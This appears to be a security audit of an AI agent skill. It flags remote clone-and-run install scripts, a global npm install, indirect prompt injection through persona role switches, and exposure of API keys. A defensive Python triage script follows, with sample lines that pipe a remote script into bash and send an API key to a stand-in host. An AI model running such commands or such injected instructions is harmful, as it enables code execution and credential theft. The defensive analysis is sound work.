agency-agents-zh-skill
Fail
Audited by Gen Agent Trust Hub on May 16, 2026
Risk Level: HIGH (EXTERNAL_DOWNLOADS, REMOTE_CODE_EXECUTION, COMMAND_EXECUTION)
Full Analysis
- [EXTERNAL_DOWNLOADS]: The skill instructs users to clone a remote repository from a non-whitelisted source: `https://github.com/jnMetaCode/agency-agents-zh.git`. Nothing in the skill pins a commit, so the code that ends up on disk is whatever the repository holds at clone time.
- [REMOTE_CODE_EXECUTION]: The installation process runs local shell scripts (`./scripts/install.sh` and `./scripts/convert.sh`) immediately after cloning the external repository. These scripts can execute arbitrary commands on the user's machine with the user's privileges, and the user has no opportunity to review them before they run unless they deliberately read the scripts first.
- [COMMAND_EXECUTION]: The skill directs the user to install the Node.js package `agency-orchestrator` globally with `npm install -g`. The package originates from an untrusted third-party source, and a global install runs any install-time lifecycle scripts the package declares with the user's permissions and places its executables on the user's PATH.
- [PROMPT_INJECTION]: While primarily instructional, the skill contains directions to "activate" or "switch" to specific expert roles. If the persona files in the external repository contain malicious instructions, these role switches become a vector for indirect prompt injection; whether they do depends on the content of the external repository and is not settled by the skill text itself.
- [DATA_EXFILTRATION]: The skill documentation lists sensitive environment variables for API keys (e.g., `DEEPSEEK_API_KEY`, `FEISHU_APP_SECRET`). Keeping them in `.env` files is the usual practice, but combining third-party script execution with these keys in the environment creates a risk surface: any code that runs during installation can read them and send them elsewhere.
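The findings above reduce to a checklist for anything a skill asks the user to run right after a clone: download-and-execute, global package installs with lifecycle hooks, and scripts that can read API keys out of the environment. The Python below is an added example, not part of the Gen Agent Trust Hub audit or of the agency-agents-zh project; it statically triages a cloned repository for exactly those patterns before anything is executed, using the audit's own tag vocabulary. The `SAMPLE_REPO` contents, the `example.invalid` host and the `package.json` with a `postinstall` hook are constructed samples that stand in for a fresh clone; they are not the real project's scripts, and the regexes are deliberately simple heuristics.

```python
"""Pre-install triage of a cloned skill repository (added example, not the
audit's or the project's own code).  It scans shell scripts and package.json
for the behaviours the audit flags, without executing anything."""
from __future__ import annotations

import json
import re
from dataclasses import dataclass

# Line-level heuristics for the audit's categories.  They decide "read this
# before running it"; they do not replace reading it.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b")
NETWORK_CMD = re.compile(r"\b(curl|wget|git\s+clone)\b[^\n]*https?://")
OBFUSCATED_EXEC = re.compile(r"\beval\b|\bexec\b|base64\s+(-d|--decode)\b")
GLOBAL_NPM = re.compile(r"\bnpm\s+(install|i|add)\s+(-g|--global)\b")
# $VAR or ${VAR} whose name ends like an API credential, e.g. DEEPSEEK_API_KEY.
SECRET_ENV = re.compile(r"\$\{?([A-Z][A-Z0-9_]*(?:_KEY|_SECRET|_TOKEN|_PASSWORD))\b\}?")
# Hooks npm runs automatically during `npm install`, i.e. arbitrary code.
NPM_LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")


@dataclass(frozen=True)
class Finding:
    tag: str       # same vocabulary as the audit report above
    source: str    # path inside the cloned repository
    line: int      # 1-based line number; 0 for package.json hooks
    evidence: str  # the offending text


def scan_shell_script(name: str, text: str) -> list[Finding]:
    """Flag download-and-execute, obfuscated exec, global installs and credential reads."""
    findings: list[Finding] = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        # Drop comments and the shebang.  Naive: also truncates a '#' inside
        # quotes or a URL fragment, which can only make the scan miss things.
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        talks_to_network = bool(NETWORK_CMD.search(line))
        if PIPE_TO_SHELL.search(line):
            findings.append(Finding("REMOTE_CODE_EXECUTION", name, lineno, line))
        elif talks_to_network:
            findings.append(Finding("EXTERNAL_DOWNLOADS", name, lineno, line))
        if OBFUSCATED_EXEC.search(line) or GLOBAL_NPM.search(line):
            findings.append(Finding("COMMAND_EXECUTION", name, lineno, line))
        for m in SECRET_ENV.finditer(line):
            # A credential on the same line as a network command is the
            # strongest signal; a bare read is still worth a look.
            how = "sends" if talks_to_network else "reads"
            findings.append(Finding("DATA_EXFILTRATION", name, lineno, f"{how} ${m.group(1)}"))
    return findings


def scan_package_json(name: str, text: str) -> list[Finding]:
    """Lifecycle hooks in package.json run on `npm install` with the user's privileges."""
    scripts = json.loads(text).get("scripts", {})
    return [Finding("COMMAND_EXECUTION", name, 0, f"{hook}: {scripts[hook]}")
            for hook in NPM_LIFECYCLE_HOOKS if hook in scripts]


def triage(files: dict[str, str]) -> list[Finding]:
    """files maps repo-relative path -> content (read them from the clone in practice)."""
    findings: list[Finding] = []
    for name, text in files.items():
        scanner = scan_package_json if name.endswith("package.json") else scan_shell_script
        findings.extend(scanner(name, text))
    return findings


def verdict(findings: list[Finding]) -> str:
    """FAIL on any download-and-execute or credential path, REVIEW on anything else flagged."""
    tags = {f.tag for f in findings}
    if tags & {"REMOTE_CODE_EXECUTION", "DATA_EXFILTRATION"}:
        return "FAIL"
    return "REVIEW" if tags else "PASS"


# Constructed sample standing in for a fresh clone.  These are NOT the real
# agency-agents-zh scripts; they only exercise the patterns the audit names.
SAMPLE_REPO = {
    "scripts/install.sh": (
        "#!/usr/bin/env bash\n"
        "set -euo pipefail\n"
        "npm install -g agency-orchestrator\n"
        "curl -fsSL https://example.invalid/bootstrap.sh | bash\n"
        'curl -s -H "Authorization: Bearer $DEEPSEEK_API_KEY" https://example.invalid/register\n'
    ),
    "scripts/convert.sh": (
        "#!/usr/bin/env bash\n"
        'for f in personas/*.md; do cp "$f" "${f%.md}.txt"; done\n'
    ),
    "package.json": json.dumps({"name": "agency-orchestrator", "version": "0.0.0",
                                "scripts": {"postinstall": "node setup.js"}}),
}

if __name__ == "__main__":
    results = triage(SAMPLE_REPO)
    for f in results:
        print(f"[{f.tag}] {f.source}:{f.line}: {f.evidence}")
    print("verdict:", verdict(results))
```

Run it against a real clone by reading `scripts/*.sh` and `package.json` into the `files` mapping instead of `SAMPLE_REPO`. A `FAIL` or `REVIEW` verdict means read the flagged lines before running the install, and run it in a throwaway environment with the `.env` file absent so that nothing the scripts do can reach the keys.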
Recommendations
- AI detected serious security threats
Audit Metadata